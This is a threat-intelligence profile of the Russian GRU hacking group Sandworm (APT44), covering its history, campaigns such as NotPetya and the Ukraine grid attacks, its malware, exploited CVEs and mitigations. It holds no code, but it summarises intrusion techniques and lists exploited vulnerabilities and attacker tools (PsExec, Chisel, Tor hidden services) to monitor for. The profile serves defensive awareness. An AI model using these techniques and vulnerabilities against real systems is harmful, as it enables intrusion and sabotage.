sandworm

Sandworm (APT44)

also known as: APT44 Seashell Blizzard IRIDIUM Voodoo Bear FROZENBARENTS Iron Viking TeleBots ELECTRUM Blue Echidna

Russia's preeminent cyber sabotage unit, operated by GRU Military Unit 74455 (Main Center for Special Technologies). Active since at least 2009, Sandworm is responsible for some of the most destructive and costly cyberattacks in history, including the 2015 and 2016 Ukraine power grid blackouts, the 2017 NotPetya global wiper attack, and the 2018 Olympic Destroyer operation. The group conducts the full spectrum of espionage, sabotage, and influence operations in support of Kremlin strategic objectives.

attributed origin Russia — GRU Unit 74455

state sponsor Russian Federation (Military Intelligence)

first observed ~2009

primary motivation Sabotage / Espionage / Disruption

primary targets Energy, Government, ICS/SCADA, Telecom, Military, Transportation

notable operations 10+ major confirmed

mitre att&ck group G0034

target regions Ukraine, Europe, North America, Middle East, Asia-Pacific

threat level Critical

Overview

Sandworm is an advanced persistent threat group operated by Military Unit 74455 of Russia's Main Intelligence Directorate (GRU), also known as the Main Center for Special Technologies (GTsST). The group's name originates from references to Frank Herbert's Dune found in early malware samples. In April 2024, Mandiant formally graduated the group to the APT44 designation, reflecting its sustained global threat posture and operational maturity.

Unlike other Russian state-backed cyber groups that specialize in a single mission, Sandworm stands apart for having developed and integrated capabilities across espionage, destructive attacks, and information operations into a unified operational playbook. Mandiant describes APT44 as a characteristic representation of Russia's "information confrontation" concept that underpins its modern cyber forces. The group is assessed with high confidence to be the Kremlin's primary cyber attack unit, both within the GRU and across the Russian government.

In October 2020, a U.S. federal grand jury indicted six GRU officers associated with Unit 74455 for their roles in a series of global cyberattacks: Yuriy Andrienko, Sergey Detistov, Pavel Frolov, Anatoliy Kovalev, Artem Ochichenko, and Petr Pliskin. The U.S. Department of State has offered a reward of up to $10 million for information leading to their identification or location. The indictment described Sandworm's campaigns as representing some of the most destructive and costly cyber operations in history.

critical

Sandworm remains highly active in 2025-2026. ESET investigated more than 10 incidents involving Sandworm-attributed destructive malware in 2025 alone, with targets across Ukraine and a significant cross-border operation against Poland's energy sector in December 2025. Amazon Threat Intelligence also identified sustained Sandworm campaigns targeting Western critical infrastructure through compromised edge devices throughout 2025, including energy utilities, defense, and managed security service providers.

Organizational Structure

Sandworm operates from a facility known as "the Tower" in the Moscow suburb of Khimki. The group is subordinated to the GRU's Information Operation Troops (VIO) and functions as a flexible instrument of Russian state power. Microsoft's research has identified a dedicated initial-access subgroup within Sandworm, responsible for the multi-year BadPilot campaign. Active since at least 2021, this subgroup conducts opportunistic, globally-scaled compromises of internet-facing infrastructure to provide Sandworm with persistent footholds on high-value targets. Since early 2024, BadPilot operations have expanded to targets in the United States, United Kingdom, Canada, and Australia.

The group's operational approach has evolved throughout Russia's war in Ukraine. While early wartime operations focused heavily on destructive cyber sabotage coordinated with kinetic military strikes, Mandiant observed a shift in the second year of the war toward intelligence collection intended to provide battlefield advantage to conventional Russian forces, including exfiltrating communications from captured mobile devices for targeting data.

Target Profile

Sandworm's targeting directly reflects Kremlin strategic priorities. Ukraine has been the group's primary focus for over a decade, but operations have a global scope wherever Russian national interests intersect.

Energy & Utilities: Sandworm has repeatedly attacked power grids and energy infrastructure. The 2015 and 2016 Ukraine blackouts were the first confirmed malware-induced power outages in history. The group deployed Industroyer2 against Ukrainian energy systems in 2022, and its DynoWiper malware was used against a Polish energy company in December 2025. Amazon identified sustained targeting of electric utilities and energy providers through 2025.
Government & Military: Ukrainian government agencies, military systems, and defense organizations are consistent targets. The group has also targeted NATO member governments, international bodies like the Organisation for the Prohibition of Chemical Weapons (OPCW), and the Parliament of Georgia.
Telecommunications: Attacks on telecom infrastructure support both intelligence collection and disruption objectives. In February 2022, the group deployed AcidRain wiper malware against Viasat's KA-SAT satellite network, disrupting Ukrainian military communications at the onset of Russia's invasion.
Transportation & Logistics: Shipping, rail, and logistics companies have been targeted to disrupt supply chains, particularly those supporting Ukraine. The grain sector was specifically targeted in 2025 operations to undermine Ukraine's agricultural economy.
Elections & Democratic Institutions: The group interfered in the 2017 French presidential election through hack-and-leak operations targeting Emmanuel Macron's La Republique En Marche! party, and has repeatedly targeted Western electoral systems and NATO member institutions.
International Sporting Events: The 2018 Olympic Destroyer attack disrupted IT infrastructure at the PyeongChang Winter Olympics in retaliation for Russia's doping ban, disabling Wi-Fi, ticketing systems, and broadcasting operations during the opening ceremony.

Tactics, Techniques & Procedures

Sandworm employs the full spectrum of offensive cyber capabilities. The group is noted for its living-off-the-land (LOTL) techniques, preference for open-source and criminally-sourced tools over custom implants, high operational security, and custom ICS/SCADA-targeting malware capabilities unmatched by other APT groups.

mitre id	technique	description
T1566	Phishing	Spearphishing emails are a core initial access method. Trust-building exchanges often precede payload delivery. Used in campaigns targeting Ukrainian defense workers, French presidential campaigns, and Ukr.net users.
T1190	Exploit Public-Facing Application	Exploitation of internet-facing infrastructure including Microsoft Exchange (CVE-2021-34473), Zimbra (CVE-2022-41352), Openfire (CVE-2023-32315), JetBrains TeamCity (CVE-2023-42793), ConnectWise ScreenConnect (CVE-2024-1709), and Fortinet FortiClient EMS (CVE-2023-48788).
T1195	Supply Chain Compromise	The 2017 NotPetya attack was delivered through a compromised update to Ukrainian tax accounting software MeDoc. In 2020, the group compromised Centreon, a French IT monitoring platform, maintaining access since 2017. BadPilot subgroup has compromised managed IT service providers to access downstream clients.
T1078	Valid Accounts	Credential replay attacks using harvested victim organization credentials against online services. Amazon Threat Intelligence documented systematic credential harvesting from compromised network edge devices throughout 2025.
T1059	Command and Scripting Interpreter	Extensive use of PowerShell, Windows Management Instrumentation (WMI), and native Windows utilities for post-exploitation. Living-off-the-land approach minimizes forensic artifacts.
T1021.002	SMB/Windows Admin Shares	NotPetya propagated using EternalBlue and EternalRomance SMBv1 exploits alongside PsExec and WMI for lateral movement. Custom tools like ITCHYSPARK use SMB connections for wiper deployment.
T1505.003	Web Shell	Custom LocalOlive web shell enables C2, file uploads, and command execution on compromised servers. Used extensively by the BadPilot subgroup for persistent access since 2021.
T1561	Disk Wipe	Prolific deployment of wiper malware families: BlackEnergy/KillDisk (2015-2016), NotPetya (2017), HermeticWiper, CaddyWiper, WhisperGate, IsaacWiper (2022), AcidRain/AcidPour, ZEROLOT, Sting, ZOV, and DynoWiper (2024-2025).
T0831	Manipulation of Control (ICS)	Custom ICS malware (Industroyer/CrashOverride, Industroyer2) designed to interface with industrial protocols and manipulate circuit breakers in power substations. Capabilities include SIPROTEC DoS module and protective relay manipulation.
T1572	Protocol Tunneling	Use of tunneling utilities including Chisel and rsockstun routed through actor-controlled infrastructure. ShadowLink utility leverages Tor hidden services for covert persistent access to compromised systems.
T1556	Modify Authentication Process	Modification of Outlook Web Access (OWA) login portals with malicious JavaScript to harvest credentials in real-time from legitimate authentication flows.
T1036	Masquerading	Olympic Destroyer was designed with extensive false flags to misdirect attribution. NotPetya masqueraded as ransomware while functioning as a pure wiper. Remote management tools (Atera, Splashtop) mimic legitimate administrative software.

Known Campaigns

Confirmed operations attributed to Sandworm by government agencies and intelligence firms.

Ukraine Power Grid Blackout DEC 2015

The first confirmed malware-induced power outage in history. BlackEnergy malware was used to compromise three Ukrainian power distribution companies, leaving approximately 230,000 people without electricity. Spearphishing emails delivered the initial access.

Industroyer / CrashOverride Attack DEC 2016

A second attack on Ukraine's power grid using Industroyer, a modular ICS malware framework designed to directly interface with power grid control systems. Approximately one-fifth of Kyiv lost power for about an hour. The malware was potentially designed to cause physical equipment destruction.

French Presidential Election Interference APR – MAY 2017

Spearphishing campaigns and hack-and-leak operations targeted Emmanuel Macron's En Marche! party prior to the 2017 French presidential election. Leaked emails included phishing infrastructure later linked to the NotPetya attack.

NotPetya Global Wiper Attack JUN 2017

A destructive wiper disguised as ransomware, delivered through a compromised update to the Ukrainian MeDoc tax software. Rapidly spread globally using EternalBlue/EternalRomance exploits and WMI/PsExec lateral movement. Caused an estimated $10+ billion in damages worldwide, crippling Maersk, FedEx/TNT Express, Merck, and hundreds of other organizations. Timed to coincide with Ukraine's Constitution Day.

Olympic Destroyer FEB 2018

Disrupted the opening ceremony of the 2018 PyeongChang Winter Olympics by disabling Wi-Fi connectivity, ticketing systems, and broadcasting operations. The malware included extensive false flags to misdirect attribution toward North Korea and China. Launched in retaliation for Russia's doping ban from the games.

OPCW & Georgia Operations 2018 – 2019

Close-access operations against the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague, coinciding with investigations into Russian chemical weapons use. Concurrent spearphishing and reconnaissance campaigns targeted Georgian government institutions.

Viasat KA-SAT Attack (AcidRain) FEB 2022

Deployed AcidRain wiper malware against Viasat's KA-SAT satellite broadband network on February 24, 2022 — the day Russia's full-scale invasion of Ukraine began. Disrupted Ukrainian military communications and caused collateral damage to satellite broadband users across Europe.

Ukraine Wartime Wiper Campaign 2022 – PRESENT

Sustained campaign deploying over a dozen wiper malware families (HermeticWiper, CaddyWiper, WhisperGate, IsaacWiper, Industroyer2, AcidPour, ZEROLOT, Sting, ZOV) against Ukrainian government, energy, telecom, transportation, logistics, media, and grain sector targets. Operations frequently coordinated with kinetic military strikes.

BadPilot Global Access Campaign 2021 – PRESENT

Multi-year initial access operation by a dedicated Sandworm subgroup, exploiting internet-facing infrastructure at scale to establish persistent footholds across energy, oil and gas, telecom, shipping, arms manufacturing, and government sectors. Expanded from Ukraine and Eastern Europe to the U.S., U.K., Canada, and Australia in 2024. Uses ShadowLink (Tor hidden services), LocalOlive web shells, and RMM tools for persistence.

Poland Power Grid Attack (DynoWiper) DEC 2025

ESET attributed an attempted wiper attack against a Polish energy company to Sandworm with medium confidence. The DynoWiper malware was deployed on December 29, 2025, during peak winter demand. The attack coincided with the 10-year anniversary of the 2015 Ukraine power grid blackout. ESET endpoint protection blocked execution, significantly limiting impact.

Tools & Malware

Sandworm maintains an extensive arsenal of custom malware alongside extensive use of open-source and commercially available tools.

BlackEnergy / KillDisk: Early backdoor and wiper combination used in the 2015-2016 Ukraine power grid attacks. BlackEnergy provided persistent access; KillDisk destroyed data and rendered systems inoperable.
Industroyer / CrashOverride: Custom ICS malware framework designed to interface with industrial control protocols and manipulate power grid circuit breakers. Includes SIPROTEC DoS module for targeting protective relays.
Industroyer2: Updated variant deployed against Ukrainian energy infrastructure in April 2022, simplified and refined for targeted ICS disruption.
NotPetya (EternalPetya): Destructive wiper masquerading as ransomware. Used EternalBlue/EternalRomance SMBv1 exploits for propagation. Caused over $10 billion in global damages.
Olympic Destroyer: Disruptive malware with extensive false flags designed to confuse attribution. Targeted IT systems at the 2018 Winter Olympics.
AcidRain / AcidPour: Wiper families capable of bricking modems, servers, and telecom equipment. AcidRain targeted Viasat satellite modems. AcidPour expanded capabilities to include data exfiltration alongside destruction.
ZEROLOT / Sting / ZOV / DynoWiper: Recent wiper families deployed in 2024-2025 campaigns against Ukrainian and Polish targets. DynoWiper shares TTPs with ZOV wiper and overwrites file contents with random data.
ARGUEPATCH / AXETERROR / Kapeka: Custom backdoors observed in post-2022 operations. AXETERROR is a Go-based backdoor with C2, file transfer, and remote command capabilities. Kapeka is a novel backdoor identified in Eastern European operations.
LocalOlive: Custom web shell enabling C2, file uploads, and command execution. Core tool in the BadPilot campaign for persistent access.
ShadowLink: Bespoke utility that configures compromised systems as Tor hidden services for covert persistent access, bypassing traditional network security monitoring.
Chisel / rsockstun: Open-source tunneling utilities used for deeper network access through actor-controlled infrastructure.

Indicators of Compromise

Publicly available IOCs from CISA advisories, DOJ indictments, and threat intelligence reports. Due to Sandworm's operational security practices and frequent retooling, IOCs have limited shelf life.

warning

Sandworm prioritizes operational security and frequently rotates infrastructure and tooling. The group's living-off-the-land techniques and use of open-source tools make signature-based detection unreliable. Behavioral detection and continuous threat hunting are essential. Cross-reference IOCs with live threat intel feeds and the latest ESET, Mandiant, and Microsoft reports.

known cves exploited (badpilot & other campaigns)

cve CVE-2021-34473 — Microsoft Exchange Server RCE (ProxyShell)

cve CVE-2022-41352 — Zimbra Collaboration Suite RCE

cve CVE-2023-32315 — Openfire Admin Console Authentication Bypass

cve CVE-2023-42793 — JetBrains TeamCity Authentication Bypass

cve CVE-2023-23397 — Microsoft Outlook Privilege Escalation

cve CVE-2024-1709 — ConnectWise ScreenConnect Authentication Bypass

cve CVE-2023-48788 — Fortinet FortiClient EMS SQL Injection

cve CVE-2018-13379 — Fortinet FortiOS SSL VPN Path Traversal

cve CVE-2019-10149 — Exim Mail Server RCE

malware indicators (2024-2025)

detection Win32/KillFiles.NMO (DynoWiper — ESET detection name)

behavior File overwriting with random 16-byte buffer on fixed and removable drives, followed by forced reboot

behavior Deployment via shared domain directories; separate logic for wiping small vs. large files

persistence Windows service creation/modification via sc.exe; BITS jobs for stealthy malware deployment; Tor hidden services via ShadowLink

Mitigation & Defense

Recommended defensive measures for organizations within Sandworm's target profile, based on CISA, Microsoft, Mandiant, and ESET guidance.

Prioritize ICS/OT security: Organizations operating industrial control systems should implement network segmentation between IT and OT environments, deploy ICS-aware monitoring solutions, and maintain visibility into industrial protocol traffic. Sandworm has demonstrated unique capabilities to interact directly with power grid control protocols.
Patch internet-facing infrastructure immediately: The BadPilot campaign exploits known vulnerabilities in Exchange, Zimbra, Openfire, TeamCity, ConnectWise ScreenConnect, and Fortinet products. Maintain aggressive patching cadence for all edge and remote access infrastructure.
Secure network edge devices: Amazon Threat Intelligence identified Sandworm targeting misconfigured customer network edge devices as a primary initial access vector through 2025. Audit configuration of routers, firewalls, and VPN appliances. Monitor for credential replay attacks against organizational authentication endpoints.
Implement offline, air-gapped backups: Sandworm's primary objective is often data destruction. Maintain multiple backup copies stored offline and physically separated from production networks. Test restoration procedures regularly against wiper scenarios.
Deploy behavioral detection for living-off-the-land techniques: Sandworm minimizes use of custom malware in favor of native Windows tools, open-source utilities, and commercially available RMM software. Signature-based detection is insufficient. Monitor for anomalous use of PowerShell, WMI, PsExec, sc.exe, BITS, and RMM tools like Atera and Splashtop.
Monitor for Tor-based persistence: Detect ShadowLink activity by monitoring for unexpected Tor client installations, hidden service configurations, and anomalous outbound connections to Tor entry nodes on compromised systems.
Hunt for web shell indicators: Regularly scan web-facing servers for LocalOlive and other web shells. Monitor for unexpected file creation in web-accessible directories and anomalous web server process behavior.
Protect supply chain and managed service providers: Sandworm has compromised IT monitoring platforms and managed service providers to access downstream clients. Evaluate supply chain risk, enforce least-privilege access for third-party vendors, and monitor for anomalous activity originating from trusted service provider connections.

note

Sandworm has a well-documented history of coordinating cyber operations with kinetic military strikes and geopolitical events. Organizations should elevate alert postures during periods of heightened geopolitical tension, major international events, and anniversary dates of prior Sandworm operations. The December 2025 Poland power grid attack coincided with the 10-year anniversary of the 2015 Ukraine blackout.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile